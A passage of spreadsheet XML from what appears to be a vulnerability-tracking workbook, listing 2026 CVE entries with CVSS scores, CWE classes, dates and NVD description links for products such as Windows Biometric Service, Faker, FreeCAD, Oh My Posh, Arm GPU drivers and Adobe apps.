          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="2251">
      <c r="A2251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="C2251" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2251" s="5" t="inlineStr"/>
      <c r="F2251" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2251" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2251" s="5" t="inlineStr"/>
      <c r="I2251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2251" s="5" t="inlineStr"/>
      <c r="K2251" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2251" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="2252">
      <c r="A2252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73001</t>
        </is>
      </c>
      <c r="C2252" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2252" s="5" t="inlineStr"/>
      <c r="F2252" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2252" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H225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52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2252" s="5" t="inlineStr"/>
      <c r="K2252" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2252" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t>
        </is>
      </c>
    </row>
    <row r="2253">
      <c r="A2253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73002</t>
        </is>
      </c>
      <c r="C2253" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2253" s="5" t="inlineStr"/>
      <c r="F2253" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2253" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2253" s="5" t="inlineStr"/>
      <c r="I2253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2253" s="5" t="inlineStr"/>
      <c r="K2253" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2253" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t>
        </is>
      </c>
    </row>
    <row r="2254">
      <c r="A2254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73007</t>
        </is>
      </c>
      <c r="C2254" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2254" s="5" t="inlineStr"/>
      <c r="F2254" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2254" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2254" s="5" t="inlineStr"/>
      <c r="I2254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2254" s="5" t="inlineStr"/>
      <c r="K2254" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2254" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t>
        </is>
      </c>
    </row>
    <row r="2255">
      <c r="A2255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73011</t>
        </is>
      </c>
      <c r="C2255" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2255" s="5" t="inlineStr"/>
      <c r="F2255" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2255" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H225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55" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2255" s="5" t="inlineStr"/>
      <c r="K2255" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2255" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t>
        </is>
      </c>
    </row>
    <row r="2256">
      <c r="A2256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73014</t>
        </is>
      </c>
      <c r="C2256" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2256" s="5" t="inlineStr"/>
      <c r="F2256" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2256" s="5" t="inlineStr"/>
      <c r="H2256" s="5" t="inlineStr"/>
      <c r="I2256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2256" s="5" t="inlineStr"/>
      <c r="K2256" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2256" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Data Sharing Service Client allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73014</t>
        </is>
      </c>
    </row>
    <row r="2257">
      <c r="A2257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="C2257" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2257" s="5" t="inlineStr"/>
      <c r="F2257" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2257" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2257" s="5" t="inlineStr"/>
      <c r="I2257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2257" s="5" t="inlineStr"/>
      <c r="K2257" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2257" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="2258">
      <c r="A2258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="C2258" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2258" s="5" t="inlineStr"/>
      <c r="F2258" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2258" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2258" s="5" t="inlineStr"/>
      <c r="I2258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2258" s="5" t="inlineStr"/>
      <c r="K2258" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2258" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="2259">
      <c r="A2259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73021</t>
        </is>
      </c>
      <c r="C2259" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2259" s="5" t="inlineStr"/>
      <c r="F2259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2259" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H225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59" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2259" s="5" t="inlineStr"/>
      <c r="K2259" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2259" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t>
        </is>
      </c>
    </row>
    <row r="2260">
      <c r="A2260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73024</t>
        </is>
      </c>
      <c r="C2260" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2260" s="5" t="inlineStr"/>
      <c r="F2260" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2260" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2260" s="5" t="inlineStr"/>
      <c r="I2260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2260" s="5" t="inlineStr"/>
      <c r="K2260" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2260" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t>
        </is>
      </c>
    </row>
    <row r="2261">
      <c r="A2261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73026</t>
        </is>
      </c>
      <c r="C2261" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2261" s="5" t="inlineStr"/>
      <c r="F2261" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2261" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H226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61" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2261" s="5" t="inlineStr"/>
      <c r="K2261" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2261" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t>
        </is>
      </c>
    </row>
    <row r="2262">
      <c r="A2262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73231</t>
        </is>
      </c>
      <c r="C2262" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2262" s="5" t="inlineStr"/>
      <c r="F2262" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2262" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H2262" s="5" t="inlineStr"/>
      <c r="I2262" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2262" s="5" t="inlineStr"/>
      <c r="K2262" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L2262" s="5" t="inlineStr">
        <is>
          <t>Faker generates massive amounts of fake data in the browser and Node.js. Prior to 10.5.0, the faker.helpers.fake method in src/modules/helpers/eval.ts allows attacker-controlled fake templates to access the Function constructor through fakeEval.resolveProperty when a function returns another function, enabling arbitrary JavaScript code execution. This issue is fixed in version 10.5.0.</t>
        </is>
      </c>
      <c r="M2262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73231</t>
        </is>
      </c>
    </row>
    <row r="2263">
      <c r="A2263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73234</t>
        </is>
      </c>
      <c r="C2263" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2263" s="5" t="inlineStr"/>
      <c r="F2263" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2263" s="5" t="inlineStr"/>
      <c r="H2263" s="5" t="inlineStr"/>
      <c r="I2263" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2263" s="5" t="inlineStr"/>
      <c r="K2263" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2263" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. Prior to 1.1.2, PropertyFileIncluded::Restore() in src/App/PropertyFile.cpp concatenates an attacker-controlled file or data attribute from Document.xml with the document transient path without rejecting directory components, absolute paths, or parent traversal. A crafted .FCStd archive with a matching FileIncluded XML attribute and ZIP entry can therefore write attacker-controlled content to arbitrary locations accessible to the FreeCAD user, potentially enabling persistence, credential compromise, configuration replacement, or code execution. This issue is fixed in version 1.1.2.</t>
        </is>
      </c>
      <c r="M2263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73234</t>
        </is>
      </c>
    </row>
    <row r="2264">
      <c r="A2264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73505</t>
        </is>
      </c>
      <c r="C2264" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2264" s="5" t="inlineStr"/>
      <c r="F2264" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2264" s="5" t="inlineStr"/>
      <c r="H2264" s="5" t="inlineStr"/>
      <c r="I2264" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2264" s="5" t="inlineStr"/>
      <c r="K2264" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L2264" s="5" t="inlineStr">
        <is>
          <t>Oh My Posh is the most customisable and low-latency cross platform/shell prompt renderer. Prior to 29.35.1, the setStyle() function in src/segments/path.go passed pt.Path, which includes raw folder names, to template.Render, whose function map exposes cmd, so an attacker-controlled directory name containing a Go template expression could execute arbitrary operating system commands as the current user whenever the prompt rendered inside that directory or a descendant. This issue is fixed in version 29.35.1.</t>
        </is>
      </c>
      <c r="M2264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73505</t>
        </is>
      </c>
    </row>
    <row r="2265">
      <c r="A2265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7476</t>
        </is>
      </c>
      <c r="C2265" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2265" s="5" t="inlineStr"/>
      <c r="F2265" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2265" s="5" t="inlineStr"/>
      <c r="H2265" s="5" t="inlineStr"/>
      <c r="I2265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2265" s="5" t="inlineStr"/>
      <c r="K2265" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2265" s="5" t="inlineStr">
        <is>
          <t>Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to access already freed memory.
This issue affects Bifrost GPU Kernel Driver: from r49p3 through r49p5, r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r49p3 through r49p5, from r51p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r49p3 through r49p5, from r51p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7476</t>
        </is>
      </c>
    </row>
    <row r="2266">
      <c r="A2266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7477</t>
        </is>
      </c>
      <c r="C2266" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2266" s="5" t="inlineStr"/>
      <c r="F2266" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2266" s="5" t="inlineStr"/>
      <c r="H2266" s="5" t="inlineStr"/>
      <c r="I2266" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2266" s="5" t="inlineStr"/>
      <c r="K2266" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2266"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r44p0 through r49p4, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r44p0 through r49p5, from r50p0 through r54p3; Arm 5th Gen GPU Architecture Kernel Driver: from r44p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7477</t>
        </is>
      </c>
    </row>
    <row r="2267">
      <c r="A2267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75631</t>
        </is>
      </c>
      <c r="C2267" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2267" s="5" t="inlineStr"/>
      <c r="F2267" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2267" s="5" t="inlineStr"/>
      <c r="H2267" s="5" t="inlineStr"/>
      <c r="I2267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2267" s="5" t="inlineStr"/>
      <c r="K2267" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2267" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75631</t>
        </is>
      </c>
    </row>
    <row r="2268">
      <c r="A2268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75771</t>
        </is>
      </c>
      <c r="C2268" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2268" s="5" t="inlineStr"/>
      <c r="F2268" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2268" s="5" t="inlineStr"/>
      <c r="H2268" s="5" t="inlineStr"/>
      <c r="I2268" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2268" s="5" t="inlineStr"/>
      <c r="K2268" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2268"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2268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t>
        </is>
      </c>
    </row>
    <row r="2269">
      <c r="A2269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75862</t>
        </is>
      </c>
      <c r="C2269" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2269" s="5" t="inlineStr"/>
      <c r="F2269" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2269" s="5" t="inlineStr"/>
      <c r="H2269" s="5" t="inlineStr"/>
      <c r="I2269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2269" s="5" t="inlineStr"/>
      <c r="K2269" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2269"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2269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t>
        </is>
      </c>
    </row>
    <row r="2270">
      <c r="A2270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75863</t>
        </is>
      </c>
      <c r="C2270" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2270" s="5" t="inlineStr"/>
      <c r="F2270" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2270" s="5" t="inlineStr"/>
      <c r="H2270" s="5" t="inlineStr"/>
      <c r="I2270" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2270" s="5" t="inlineStr"/>
      <c r="K2270" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2270"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2270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t>
        </is>
      </c>
    </row>
    <row r="2271">
      <c r="A2271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75992</t>
        </is>
      </c>
      <c r="C2271" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2271" s="5" t="inlineStr"/>
      <c r="F2271" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2271" s="5" t="inlineStr"/>
      <c r="H2271" s="5" t="inlineStr"/>
      <c r="I2271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2271" s="5" t="inlineStr"/>
      <c r="K2271" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2271" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75992</t>
        </is>
      </c>
    </row>
    <row r="2272">
      <c r="A2272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76957</t>
        </is>
      </c>
      <c r="C2272" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2272" s="5" t="inlineStr"/>
      <c r="F2272" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2272" s="5" t="inlineStr"/>
      <c r="H2272" s="5" t="inlineStr">
        <is>
          <t>libexpat_project:libexpat</t>
        </is>
      </c>
      <c r="I2272" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2272" s="5" t="inlineStr"/>
      <c r="K2272" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2272" s="5" t="inlineStr">
        <is>
          <t>libexpat before 2.8.4 lacks handler call depth tracking with custom encoding callbacks. Thus, a use-after-free can occur. NOTE: this is similar to CVE-2026-50219, CVE-2026-56131 and CVE-2026-56412.</t>
        </is>
      </c>
      <c r="M2272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76957</t>
        </is>
      </c>
    </row>
    <row r="2273">
      <c r="A2273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76967</t>
        </is>
      </c>
      <c r="C2273" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2273" s="5" t="inlineStr"/>
      <c r="F2273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2273" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2273" s="5" t="inlineStr"/>
      <c r="I2273" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2273" s="5" t="inlineStr"/>
      <c r="K2273" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L2273" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Business Client does not perform sufficient validation when processing certain locally stored data during application startup. An attacker with low privileges on the local system could replace this data with specially crafted content. When the application is next launched, the crafted content is processed and could lead to arbitrary code execution in the context of the user. This results in a high impact on confidentiality, integrity and availability of the application.</t>
        </is>
      </c>
      <c r="M2273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t>
        </is>
      </c>
    </row>
    <row r="2274">
      <c r="A2274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="C2274" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2274" s="5" t="inlineStr"/>
      <c r="F2274" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2274" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
